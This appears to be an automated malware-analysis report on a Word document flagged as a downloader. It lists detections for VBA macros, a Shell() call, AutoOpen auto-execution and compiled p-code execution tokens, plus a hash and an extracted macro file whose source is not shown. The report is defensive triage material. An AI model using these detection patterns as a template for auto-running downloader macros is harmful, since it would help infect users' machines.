Verdict: MALICIOUS
Risk Score: 242
Heuristics: 7
- ClamAV: Doc.Downloader.Sagent-6668012-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sagent-6668012-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9978 bytes |

SHA-256: f7604157a4e2d677e0db1b3118e9e1102a4629dc3306d7180183832a611ec871

Preview script: first 1,000 lines of the extracted script